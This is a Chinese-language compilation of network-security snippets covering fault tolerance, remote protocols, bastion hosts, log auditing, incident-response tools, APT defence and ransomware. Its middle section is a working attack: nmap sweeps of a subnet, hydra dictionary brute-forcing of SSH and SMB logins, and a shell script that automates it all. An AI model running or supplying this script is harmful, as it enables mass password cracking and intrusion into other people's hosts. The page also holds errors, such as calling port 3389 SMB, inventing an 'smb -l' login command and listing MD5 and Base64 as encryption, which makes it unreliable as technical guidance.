容錯系統，是當計算機系統內的部件出現允許故障時，仍能正確執行所規定任務的一種計算機系統，實施該系統的重要性是能夠支持系統的備份和避免系統故障以維持系統的運行，使得計算機既能容忍故意邏輯故障又能容忍隨機物理故障。系統容錯這個特性允許你為一個系統提供硬件冗余。容錯是更一般的術語。Novell公司用SFT來描述NetWare中的容錯特征。SFT允許你安裝兩個硬盤，并且在輔硬盤上的內容是主硬盤內容的鏡像。

如果主硬盤發生故障，輔硬盤就接替它的工作。磁盤控制器也可以雙份，或雙工工作以進一步防止硬件發生故障。SFT Level Ⅲ(可選)通過雙工整個服務器而進一步提供了冗余性。假如主服務器停機時，輔服務器同步無間斷地接替它的工作。

SFT Ⅲ可防止以下機器失效帶來的損失：隨機存儲器(RAM)的失效、磁盤的失效、局域網適配器的失效。它允許將服務器放置到不同的地方，以防止局部性的災難事件或電源故障，但在復置系統需要使用高速鏈路來保持緊密同步。另外，由于服務器是鏡像的，所以當一臺服務器繼續工作時，可在另一臺上進行例程服務和升級。當升級后的服務器又接連回后，它的文件系統需要和另一臺服務器進行同步處理。

系統能自動切換資源，采取補救措施，以保證系統繼續正確執行任務。這種切換可以是切換到處于待用狀態的設備，也可以是把大部分負載轉給非飽和狀況運行的設備，還可以是在計算機系統不停止運行 情況下，切換電源、冷卻系統或其它部件。設計這種計算機采用了容錯技術，如采用了糾錯碼、系統恢復技術、冗余技術、指令復執、程序復算、備件切換、系統降級重新組合、配置檢查程序和診斷程序等。但當系統 出現了容錯措施許可范圍以外的故障時，計算機仍然不能繼續正確運行。容錯計算機多用于要求高可靠性、 高安全性的場合。如用于飛機自動駕駛的控制系統、航 天飛機操縱系統、衛星的星載系統等。

• RDP

RDP遠程協議是一個多通道協議，讓用戶通過本地電腦連接遠程服務器。 大部分的Windows、Linux服務器都有相應的客戶端。 行云管家基于B/S架構（Browser/Server，瀏覽器/服務器模式）設計，直接使用瀏覽器遠程連接服務器，支持原生RDP遠程協議，中文操作界面，可遠程連接、登錄、管理Linux/Windows服務器。

• SSH

SSH為Secure Shell的縮寫，由IETF的網絡工作小組（Network Working Group）所制定；SSH為建立在應用層和傳輸層基礎上的安全協議。

• VNC

VNC文件傳輸協議： VNC是虛擬網絡控制臺(Virtual Network Console)的縮寫，是在基于類UNIX操作系統的免費的開源軟件，遠程控制管理功能強大，但是由于VNC協議自身的限制，無法提供文件上傳下載的能力，因此用戶在行云管家中使用VNC相關協議訪問服務器時，同樣也無法進行文件傳輸。

• Telnet

telnet是TCP／IP 環境下的終端仿真協議，通過 TCP 建立服務器與客戶機之間的連接。它最初是由ARPANET 開發的，但是現在它主要用于Internet 會話。它的基本功能是，允許用戶登錄進入遠程主機系統。

• FTP

FTP（File Transfer Protocol，文件傳輸協議） 是 TCP/IP 協議組中的協議之一。FTP協議包括兩個組成部分，其一為FTP服務器，其二為FTP客戶端。其中FTP服務器用來存儲文件，用戶可以使用FTP客戶端通過FTP協議訪問位于FTP服務器上的資源。在開發網站的時候，通常利用FTP協議把網頁或程序傳到Web服務器上。此外，由于FTP傳輸效率非常高，在網絡上傳輸大的文件時，一般也采用該協議。

• SFTP

SFTP是用SSH封裝過的FTP協議，相當于經過加密的FTP協議，功能與FTP一樣，只是傳輸數據經過加密。

下面以某開源堡壘機搭建為例：

1. 準備Python3和Python虛擬環境：

   a. 安裝依賴包；

   b. 編譯安裝python3；

   c. 建立Python虛擬環境；

2. 安裝堡壘機：

   a. 下載或Clone項目；

   b. 安裝依賴RPM包；

   c. 安裝Python庫依賴；

   d. 安裝Redis；

   e. 創建數據庫堡壘機并授權；

   f. 修改堡壘機配置文件；

   g. 生成數據庫表結構和初始化數據；

   h. 運行堡壘機；

3. 安裝SSHServer和WebSocketServer：

   a. 下載或Clone項目；

   b. 安裝依賴；

   c. 查看配置文件并運行；

   d. 測試連接；

4. 安裝WebTerminal前端；

5. 配置Nginx整合各組件；

堡壘機配置CRT方法步驟如下：

1. 控件安裝之后，進入到控件安裝路徑下（默認安裝路徑為：C:\sso_client）。

2. 打開 SecureCRT。

3. 單擊選項 > 全局選項。

4. 單擊終端 > 網頁瀏覽器，進入網頁瀏覽器設置頁面。

5. 將 SSH2，SSH1 和 Telnet 選項，設置為 “設置SecureCRT為你的默認xxx工具”。

1. ecureCRT 設置完畢后，在運維界面登錄 Linux 資源時，選擇連接工具 SecureCRT 即可。

日志審計應具備以下功能：

日志監控功能

  提供日志監控能力，支持對采集器、采集器資產的實時狀態進行監控，支持查看CPU、磁盤、內存總量及當前使用情況；支持查看資產的概覽信息及資產關聯的事件分布。

日志采集功能

  提供全面的日志采集能力，支持網絡安全設備、網絡設備、數據庫、windows/linux主機日志、web服務器日志、虛擬化平臺日志以及自定義等日志。提供多種的數據源管理功能：支持數據源的信息展示與管理、采集器的信息展示與管理以及agent的信息展示與管理；提供分布式外置采集器、Agent等多種日志采集方式；支持IPv4、IPv6日志采集、分析以及檢索查詢。

日志存儲功能

  提供原始日志、范式化日志的存儲，可自定義存儲周期，支持FTP日志備份以及NFS網絡文件共享存儲等多種存儲擴展方式。

日志檢索功能

  提供豐富靈活的日志查詢方式，支持全文、key-value、多kv布爾組合、括弧、正則、模糊等檢索；提供便捷的日志檢索操作，支持保存檢索、從已保存的檢索導入見多條件等。

日志分析功能

  提供便捷的日志分析操作，支持對日志進行分組、分組查詢以及從葉子節點可直接查詢分析日志。

日志轉發功能

  支持原始日志、范式化日志轉發。

日志事件告警功能

  內置豐富的單源、多源事件關聯分析規則，支持自定義事件規則，可按照日志、字段布爾邏輯關系等方式自定義規則；支持時間的查詢、查詢結果統計以及統計結果的展示等；支持對告警規則的自定義，可設置針對事件的各種篩選規則、告警等級等。

日志報表管理功能

  支持豐富的內置報表以及靈活的自定義報表模式，支持編輯報表的目錄接口、引用統計項、設置報表標題、展示頁眉和頁碼、報表配置基本內容（名稱、描述等）；支持實時報表、定時報表、周期性任務報表等方式；支持html，pdf，word格式的報表文件以及報表logo的靈活配置。

網絡數據常見的加密方式如下：

• 鏈路加密：對網絡中兩個相鄰節點之間傳輸的數據進行加密保護；

• 節點加密：指在信息傳輸路過的節點處進行解密和加密；

• 端到端加密：指對一對用戶之間的數據連續的提供保護；

• 算法加密：MD5加密、Base64加密、DES加密、AES加密、RSA加密、SHA1、SHA256、SHA512加密。

Bootkit和Rootkit的區別：

• Bootkit是通過感染MB磁盤主引記錄的方式對計算機進行攻擊，而Rootkit則是對內存進行攻擊；

• Rootkit是捆綁在其他軟件上以隱藏自己的文件和信息來進行攻擊，而bookit則不需要進行軟件捆綁；

• Rootkit需要被攻擊設備正常啟動后才可以實施攻擊，Bootkit則會在被攻擊設備系統加載前進行攻擊；

• Bootkit注入內核的代碼沒有內存大小限制也不需要自己讀代碼，Rootkit不行；

• Bootkit理論上可以引導各個版本的內核和內存參數，Rootkit不行。

ProcessHacker

　　是一款不錯的進程分析工具，可查看所有進程信息，包括進程加載的dll、進程打開的文件、進程讀寫的注冊表……也可以將特定進程的內存空間Dump到本地，此外還可以查看網絡連接。

ProcessExplorer

　　是一款不錯的進程分析工具，微軟官方推薦工具，穩定性和兼容性相對不錯。可查看所有進程的信息，包括其加載的dll、創建的線程、網絡連接……同樣可以Dump出進程的內存空間到本地。

ProcessMonitor

　　是一款實時刷新的進程信息監控工具，微軟官方推薦工具，穩定性和兼容性也是相對出色。展示的信息很全面，且每一個打開的句柄、注冊表、網絡連接……都與具體的進程關聯起來。

Xue Tr

　　是一個Windows系統信息查看軟件，可協助排查木馬、后門等病毒。

PCHunter

　　XueTr的增強版，功能和XueTr差不多，可參考上圖。推薦更多使用PCHunter，減少出故障的概率。

ProcessDump

　　可對指定的進程，將其進程空間內的所有模塊單獨Dump出來，甚至可Dump出隱藏的模塊(即進程加載的dll，這里通常是被注入)。

PsTools

　　是命令行工具集，微軟官方推薦，功能多而全。

Wireshark

　　是一款常用的網絡抓包工具，同時也可以用于流量分析。

TCPView

　　查看系統的網絡連接詳情，每一條連接對應的進程、協議、進程、源目地址、源目端口、連接狀態……總之，可展示當前活躍連接的所有詳細信息。

AutoRuns

　　一款不錯的啟動項分析工具，微軟官方推薦。只要涉及到啟動項相關的信息，事無巨細，通通都可以查詢得到，非常方便找到病毒的啟動項。

FastIR

　　收集操作系統的關鍵日志、關鍵信息，方便后續取證和排查分析。收集瀏覽器的歷史記錄，方便追溯域名、URL的訪問來源是否源自于用戶行為。

網絡安全解決方案的主要任務有以下這些：

• 調研網絡系統：深入實際調研用戶的計算機網絡系統，包括各級機構、基層業務單位和移動用戶的廣域網的運行情況，還包括網絡系統的結構、性能、信息點數量和采取的安全措施等，對網絡系統面臨的威脅及可能承擔的風險進行定性與定量的具體分析與評估。

• 分析評估網絡系統：對網絡系統的分析評估主要包括服務器操作系統和客戶端操作系統的運行情況，如操作系統的類型及版本、提供用戶權限的分配策略等，在操作系統最新發展趨勢的基礎上，對操作系統本身的缺陷及可能帶來的風險及隱患進行定性和定量的分析和評估。

• 分析評估應用系統：對應用系統的分析評估主要包括業務處理系統、辦公自動化系統、信息管理系統、電網實時管理系統、地理信息系統和互聯網信息發布系統等的運行情況，如應用體系結構、開發工具、數據庫軟件和用戶權限分配等。在滿足各級管理人員和業務操作人員的業務需求的基礎上，對應用系統存在的具體安全問題、面臨的威脅及可能出現的風險隱患進行定性與定量的分析和評估。

• 制定網絡系統安全策略和解決方案：在上述定性和定量評估與分析基礎上，結合用戶的網絡系統安全需求和國內外網絡安全的最新發展態勢，按照國家規定的安全標準和準則進行具體安全方案的設計，針對性地制定出機構網絡系統具體的安全策略和解決方案，確保機構網絡系統安全、可靠地運行。

• 提高網絡的安全性：這個是該方案最基本的功能，我們的生活已經離不開網絡啦，網絡安全對于我們來說是非常重要的，使用該方案可以有效提高安全性，但是還是不能粗心大意。

防止路由器被入侵的對策有以下這些：

• 公開服務器的安全保護：將哪些對外服務的服務器加強保護，盡量定期更新系統和對所使用的內部軟件進行安裝補丁，避免被不法分子惡意利用攻擊。同時，需要定期安裝最新的操作系統，減少系統漏洞，提高服務器的安全性。

• 防止黑客從外部攻擊：安裝防火墻軟件，監視數據流動。要盡量選用最先進的防火墻軟件和硬件，加強外部防護，防止黑客從外部入侵，對來路不明的電子郵件或者附件需要保持警惕，不要隨便打開，盡量使用最新的互聯網瀏覽器軟件和電子郵件系統。

• 入侵檢測與監控：入侵檢測是指“通過對行為、安全日志或審計數據或其它網絡上可以獲得的信息進行操作，檢測到對系統的闖入或闖入的企圖”。入侵檢測是檢測和響應計算機誤用的學科，其作用包括威懾、檢測、響應、損失情況評估、攻擊預測和起訴支持。入侵檢測系統（IDS）可以被定義為對計算機和網絡資源的惡意使用行為進行識別和相應處理的系統。包括系統外部的入侵和內部用戶的非授權行為，是為保證計算機系統的安全而設計與配置的一種能夠及時發現并報告系統中未授權或異常現象的技術，是一種用于檢測計算機網絡中違反安全策略行為的技術。

• 信息審計與記錄：對進出內部網絡的信息，為防止或追查可能的泄密行為所進行的實時內容審計。網絡信息內容審計與信息檢索等研究具有一定相似性，兩者均以文本為主要的處理對象，都按照一定規則進行分析并得出有益的結果。但兩者也存在較大區別，在系統模型、數據源、分析規則、應用需求等方面存在差異。網絡信息內容審計涵蓋了計算機網絡、自然語言處理、數據挖掘、人工智能、復雜網絡等多個學科領域。

• 病毒防護：防病毒指用戶主動性的防范電腦等電子設備不受病毒入侵，從而避免用戶資料泄露、設備程序被破壞等情況的出現。病毒潛伏在計算機中，即使還沒有開始發作也總會留下一些“蛛絲馬跡”。用戶要想知道自己的計算機是否感染有病毒，最簡單易行的方法就是使用反病毒軟件對磁盤進行全面的檢測。如果要想檢測出最新的病毒，則必須保證自己使用的反病毒軟件的病毒碼得到了及時的更新(也就是使用最新版的殺毒軟件并及時升級)。如果手頭沒有反病毒軟件，則可根據下列計算機中毒后所引起的系統異常癥狀來做出初步的判斷。

• 數據安全保護：數據安全保護系統是依據國家重要信息系統安全等級保護標準和法規，以及企業數字知識產權保護需求，自主研發的產品。它以全面數據文件安全策略、加解密技術與強制訪問控制有機結合為設計思想，對信息媒介上的各種數據資產，實施不同安全等級的控制，有效杜絕機密信息泄漏和竊取事件。

• 數據備份與恢復：數據備份就是將數據庫的內容全部復制出來保存到計算機的另一個位置或者其他存儲設備上。數據庫備份也有很多種，主要有物理備份和邏輯備份。物理備份對數據庫的操作系統物理文件(如數據文件、控制文件和日志文件等)的備份邏輯備份對數據庫邏輯組件(如表、視圖和存儲過程等數據庫對象)的備份。什么是數據恢復數據恢復就是把從數據庫中備份出來的數據重新還原給原來的數據庫。

• 網絡的安全管理：網絡安全管理是保護網絡安全的一種方法，計算機網絡是人們通過現代信息技術手段了解社會、獲取信息的重要手段和途徑。網絡安全管理是人們能夠安全上網、綠色上網、健康上網的根本保證。

第一步：找到網段內存活的主機

使用nmap工具查找存活的主機并存到up.txt里面，具體代碼如下：

在命令行輸入：nmap -sn 172.18.16.0/24 > up.txt

從up.txt里面過濾出ip地址存到ip.txt里面，代碼如下：

cat up.txt | grep for | awk '{print $5}'>ip.txt

第二步：使用nmap工具掃描linux和windows的遠程端口

linux系統：

cat /etc/ssh/sshd_config 命令查看linux的遠程端口，linux的遠程端口是22，ssh協議。

windows系統：

開始—運行–cmd下輸入 netstat –nba，命令查看linux的遠程端口，windows的遠程端口是3389，smb協議。

查到遠程登陸窗口后，使用nmap掃描22和3389的端口，代碼如下：

nmap -p22,3389 -iL ip.txt > res.txt

第三步：從結果里過濾出22端口開著的ip地址

從結果里過濾出22端口開著的ip地址，存放到sship.txt里面，代碼如下：

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt

sship.txt里面的ip地址都是ssh遠程開著的linux系統，接下來我們只要用hydra得到它們的密碼就可以遠程登陸linux系統了。

第四步：從結果里過濾出3389端口開著的ip地址

從結果里過濾出3389端口開著的ip地址，存放到smbip.txt里面，代碼如下：

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt

與第三步類似，smbip.txt里面的ip地址都是smb遠程開著的windows系統，接下來我們只要用hydra得到它們的密碼就可以遠程登陸windows系統了。

第五步：使用hydra暴力破解linux密碼

在命令行輸入以下命令：

hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt

這段shell使用了user.txt用戶名詞典和passwd.txt密碼詞典以及開啟ssh服務的ip地址，使用hydra進行暴力破解，從暴破結果中過濾取出ip地址對應的用戶名和密碼。

第六步：使用hydra暴力破解windows密碼

hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt

與第五步相仿，不同的只是協議和ip地址。

第七步：使用找到的密碼遠程登陸

linux遠程連接命令：

ssh -l root 172.18.*.*

輸入這個命令之后，系統會提示你輸入密碼passwd：，這時候你輸入獲取的密碼就可以遠程登陸了。

windows遠程連接命令：

smb -l Administrator 172.18.*.*

根據提示輸入密碼，就可以遠程登陸了。

最后，我把這些命令寫成了一個shell，如下：

#!/bin/sh
para1=$#
para2=$1
if [ $para1 -eq 0 ]; then
  echo "請輸入你的位置變量"
else
echo "-------------------stpe1 check up host list---------------------------"
echo "nmap -sn $para2 , please wait for moment......"
nmap -sn "$para2">up.txt
cat up.txt | grep for | awk '{print $5}'>ip.txt
echo "up host is done , save to up.txt"
echo "-------------------stpe2 port check 22 and 3389-----------------------"
echo "22 and 3389 port checking...  please wait for moment......"
nmap -p22,3389 -iL ip.txt > res.txt
echo "-------------------stpe3 select  22 port------------------------------"
echo "doing 22 save to sship.txt"
cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
echo "-------------------stpe4 select  3389 port----------------------------"
echo "doing 3389 save to 3389ip.txt"
cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt


echo "-----------------------------stpe5 attack ssh------------------------"
hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt


echo "-------------------------stpe6 attack 3389---------------------------"
hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt


cat -n find.txt


fi

APT攻擊不能完全防止只能通過以下方法減緩和主動防御：

• 使用威脅情報：這包括APT操作者的最新信息、從分析惡意軟件獲取的威脅情報、已知的C2網站、已知的不良域名、電子郵件地址、惡意電子郵件附件、電子郵件主題行以及惡意鏈接和網站。威脅情報在進行商業銷售，并由行業網絡安全組共享。企業必須確保情報的相關性和及時性。威脅情報被用來建立“絆網”來提醒你網絡中的活動。

• 建立強大的出口規則：除網絡流量（必須通過代理服務器）外，阻止企業的所有出站流量，阻止所有數據共享和未分類網站。阻止SSH、FTP、Telnet或其他端口和協議離開網絡。這可以打破惡意軟件到C2主機的通信信道，阻止未經授權的數據滲出網絡。

• 收集強大的日志分析：企業應該收集和分析對關鍵網絡和主機的詳細日志記錄以檢查異常行為。日志應保留一段時間以便進行調查。還應該建立與威脅情報匹配的警報。

• 聘請安全分析師：安全分析師的作用是配合威脅情報、日志分析以及提醒對APT的積極防御。這個職位的關鍵是經驗。

• 對未知文件進行檢測：一般通過沙箱技術罪惡意程序進行模擬執行，通過對程序的行為分析和評估來判斷未知文件是否存在惡意威脅。

• 對終端應用監控：一般采用文件信譽與黑白名單技術在終端上檢測應用和進程。

• 使用大數據分析方法：基于大數據分析的方法，通過網絡取證，將大數據分析技術和沙箱技術結合全面分析APT攻擊。

常用的數字標識技術有以下四種：

• 公開密鑰加密技術：公開密鑰也稱為非對稱密鑰，每個人都有一對唯一對應的密鑰：公開密鑰（簡稱公鑰）和私人密鑰（簡稱私鑰），公鑰對外公開，私鑰由個人秘密保存；用其中一把密鑰加密，就只能用另一把密鑰解密。非對稱密鑰加密算法的典型代表是RSA。

• 私有密鑰加密技術：是為保證在開放式環境中網絡傳輸的安全而提供的加密服務。在私用密鑰機制中，信息采用發送方和接收方保存的私有的密鑰進行加密。這種系統假定雙方已經通過一些人工方法交換了密鑰，并且采用的密鑰交換方式并不危及安全性。

• 數字簽名技術：數字簽名（又稱公鑰數字簽名）是只有信息的發送者才能產生的別人無法偽造的一段數字串，這段數字串同時也是對信息的發送者發送信息真實性的一個有效證明。它是一種類似寫在紙上的普通的物理簽名，但是在使用了公鑰加密領域的技術來實現的，用于鑒別數字信息的方法。一套數字簽名通常定義兩種互補的運算，一個用于簽名，另一個用于驗證。數字簽名是非對稱密鑰加密技術與數字摘要技術的應用。

• 數字信封技術：數字信封是將對稱密鑰通過非對稱加密（即：有公鑰和私鑰兩個）的結果分發對稱密鑰的方法。數字信封是實現信息保密性驗證的技術。在數字信封中，信息發送方采用對稱密鑰來加密信息內容，然后將此對稱密鑰用接收方的公開密鑰來加密（這部分稱數字信封）之后，將它和加密后的信息一起發送給接收方，接收方先用相應的私有密鑰打開數字信封，得到對稱密鑰，然后使用對稱密鑰解開加密信息。這種技術的安全性相當高。數字信封主要包括數字信封打包和數字信封拆解，數字信封打包是使用對方的公鑰將加密密鑰進行加密的過程，只有對方的私鑰才能將加密后的數據(通信密鑰)還原；數字信封拆解是使用私鑰將加密過的數據解密的過程。

大數據業務流程安全防護面臨的問題有：

• 在數據采集階段:系統可能會將用戶的關鍵隱私數據采集并流轉至系統的非信任區域，并因此失去對這些關鍵數據的控制，導致用戶隱私數據泄露等安全風險。

• 在數據存儲階段:由于用戶的所有關鍵數據的明文存儲，因此很可能存在數據被盜用、濫用情況，導致用戶隱私信息泄露。

• 在數據挖掘階段:對用戶數據分析結果使用的不可控性，在數據挖掘分析中會存在數據非授權訪問，并且在挖掘算法升級時，系統的操作維護動作還可能會將原始數據或加工數據直接丟棄，造成關鍵數據流失。

• 在數據應用階段:廣告投放過程和計費信任程度不可控。

• 數據交付階段:中會存在不合規的數據挖掘結果發布，以及數據泄露后無法追溯取證等問題。

大數據業務流程安全防護措施如下：

• 更新云計算和分布式安全基礎設施：大數據的增長促使許多企業轉向允許更多數據存儲可擴展性的云計算和數據結構基礎設施。那么面臨的問題是什么？云安全通常是基于傳統安全原則建立的，因此，云安全功能配置錯誤并容易受到攻擊。企業與云計算和存儲供應商討論他們的產品，是否嵌入了安全解決方案，以及他們或第三方合作伙伴是否推薦任何其他安全資源。

• 設置移動設備管理政策和程序：物聯網和其他移動設備是大數據的一些最大來源和接收者，但它們也提供了幾個安全漏洞，因為這些技術中有很多是為個人生活所擁有和使用的。為員工如何使用個人設備上的企業數據制定嚴格的政策，并確保設置額外的安全層，以管理哪些設備可以訪問敏感數據。

• 提供數據安全培訓和最佳實踐：在大多數情況下，大數據因成功的網絡釣魚攻擊或其他針對不知情人員的個性化攻擊而受到損害。就典型的社會工程攻擊及其方式對企業的員工進行培訓，并再次設置多層身份驗證安全以限制誰可以訪問敏感數據存儲。

Globeimposter是一種仿冒Purge勒索病毒類型的病毒 。Globeimposter勒索病毒最早在2017年出現。2018年8月21日起，多地發生Globeimposter勒索病毒事件，攻擊目標主要是開啟遠程桌面服務（Rdp）的服務器。攻擊者通過暴力破解服務器密碼，對內網服務器發起掃描并投放勒索病毒，導致文件被加密。該病毒有多個版本，并常通過暴力破解Rdp后投毒傳播，暫時無法解密。

降低計算機病毒危害的措施有以下這些：

• 安裝和維護防病毒軟件：防病毒軟件可識別惡意軟件并保護我們的計算機免受惡意軟件侵害。安裝來自信譽良好的供應商的防病毒軟件是預防和檢測感染的重要步驟。始終直接訪問供應商網站，而不是點擊廣告或電子郵件鏈接。由于攻擊者不斷地制造新病毒和其他形式的惡意代碼，因此保持我們使用的防病毒軟件保持最新非常重要。

• 謹慎使用鏈接和附件：在使用電子郵件和網絡瀏覽器時采取適當的預防措施以降低感染風險。警惕未經請求的電子郵件附件，并在單擊電子郵件鏈接時小心謹慎，即使它們貌似來自我們認識的人。

• 阻止彈出廣告：彈出窗口阻止程序禁用可能包含惡意代碼的窗口。大多數瀏覽器都有一個免費功能，可以啟用它來阻止彈出廣告。

• 使用權限有限的帳戶：瀏覽網頁時，使用權限有限的賬戶是一種很好的安全做法。如果我們確實受到感染，受限權限可防止惡意代碼傳播并升級到管理賬戶。

• 禁用外部媒體自動運行和自動播放功能：禁用自動運行和自動播放功能可防止感染惡意代碼的外部媒體在我們的計算機上自動運行。

• 更改密碼：如果我們認為我們的計算機受到感染，應該及時更改我們的密碼(口令)。這包括可能已緩存在我們的網絡瀏覽器中的任何網站密碼。創建和使用強密碼，使攻擊者難以猜測。

• 保持軟件更新：在我們的計算機上安裝軟件補丁，這樣攻擊者就不會利用已知漏洞。如果可用，請考慮啟用自動更新。

• 資料備份：定期將我們的文檔、照片和重要電子郵件備份到云或外部硬盤驅動器。如果發生感染，我們的信息不會丟失。

• 安裝或啟用防火墻：防火墻可以通過在惡意流量進入我們的計算機之前阻止它來防止某些類型的感染。一些操作系統包括防火墻;如果我們使用的操作系統包含一個防火墻，請啟用它。

• 使用反間諜軟件工具：間諜軟件是一種常見的病毒源，但可以通過使用識別和刪除間諜軟件的程序來最大程度地減少感染。大多數防病毒軟件都包含反間諜軟件選項，確保啟用。

• 監控賬戶：尋找任何未經授權的使用或異常活動，尤其是銀行賬戶。如果我們發現未經授權或異常的活動，請立即聯系我們的賬戶提供商。

• 避免使用公共Wi-Fi：不安全的公共Wi-Fi可能允許攻擊者攔截我們設備的網絡流量并訪問我們的個人信息。